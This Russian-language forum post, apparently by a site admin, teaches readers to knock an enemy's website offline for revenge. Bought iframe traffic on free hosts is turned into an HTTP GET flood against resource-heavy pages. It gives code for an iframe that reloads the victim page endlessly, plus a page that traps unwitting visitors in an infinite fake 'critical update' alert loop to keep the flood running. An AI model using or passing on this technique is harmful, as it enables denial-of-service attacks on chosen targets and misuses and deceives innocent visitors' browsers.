Admin
Администратор
Альтернативные возможности использования iframe трафика
Наверное многим из нас знакомо желание (не самое лучшее с точки зрения влияния на карму :blink: ) отомстить какому нибудь уроду, который тебя кинул\наебал\развел и пр... Допустим что вам известен сайт злодея, что же можно с ним поделать?
Ну во первых можно чисто теоретически его ломануть, причем если руки растут из правильного места то своими, или же заказать взлом профи.
Во вторых это заддосить нахрен подлеца
Таки при отсутствии специализированных знаний влетит такое "самоудовлетворение" в копеечку. Не будем говорить о расценках на сегодняшний день, но они немаленькие однозначно.
Сегодня я вам расскажу как можно устроить пакость своими собственными руками, при этом не наступая на грабли закона.
Для этого нам потребуется с десяток собственноручно зареганных фрихостов, при этом желательно на разных доменах, немного писанины и собственно iframe трафик, который можно при особом желании прикупить за копейки.
Теперь о том как это все работает. Во первых таким способомо можно организовать только http GET DOS, по крайней мере это то что первое приходит в голову. Мы выбираем ресурсоемкие скрипты на сервере жертвы (это могут быть поисковые запросы по сайту, вывод страниц с большим количеством элементов, желательно гененрируемых скриптами и пр...) и начинаем сливать на них трафик. НО, если тупо лить фрейм, то это получится нифига не выгодно, ибо придется реально раскошелиться на такой поток.
Задача:
1. Нам нужно каким то образом более продуктивно использовать трафик
2. Необходимо увеличить качество iframe применительно для нашей задачи.
Солюшн:
Итак первое что приходит мне на ум это тупое распараллеливание одного iframe потока на десятки таких потоков, что позволяет получить с 1к iframe трафика около 10-20к настоящих заходов на сайт жертвы. Все просто, но мы пойдем дальше, для этого мы кроме распараллеливания потоков воспользуемся методом тега iframe как onLoad. Напишем такой простенький скрипт:
HTML:
<iframe src="victim.html" onload="this.src='victim.html'"></iframe>Но не будем спешить и прибережем денюшку. Сейчас мы попытаемся получить максимальный выхлоп с потраченных средств. Итак, я думаю очевидно что чем дольше будут перезагружаться странички с сайтом жертвы, тем более нагружен будет его сервер одним и тем же покупным iframe потоком. Существует понятие "времени жизни трафика" или "длительности сессии серфера" которые определяют время, пока будет открыта вкладка\окно с фреймом на нашу страничку. Поверьте мы можем существенно увеличить это время, правда достаточно грубым методом
Давайте рассмотрим код ниже:
HTML:
<html>
<body onunload="alert_block()">
<script>
function alert_block()
{
while(1)
{
alert('Внимание! Выполнятеся критическое обновление! Вы не можете сейчас закрыть браузер.');
}
}
</script>
<iframe src="victim.html" onload="this.src='victim.html'"></iframe>
</body>
</html>Таким образом сегодня я вам поведал о потенциальной возможности "уложить" сайт недоброжелателя своими собственными руками и при этом сильно не тратиться. На этом лабораторная работа подошла к концу, все остальное допиливается напильником дома, а отчеты по лабе жду в виде постов
P.S. Все что вы собираетесь совершить злобного начитавшись эту статью остается на вашей совести (и не забывайте про свою карму) я лишь показал еще одну возможность развлечься в сети
удачи!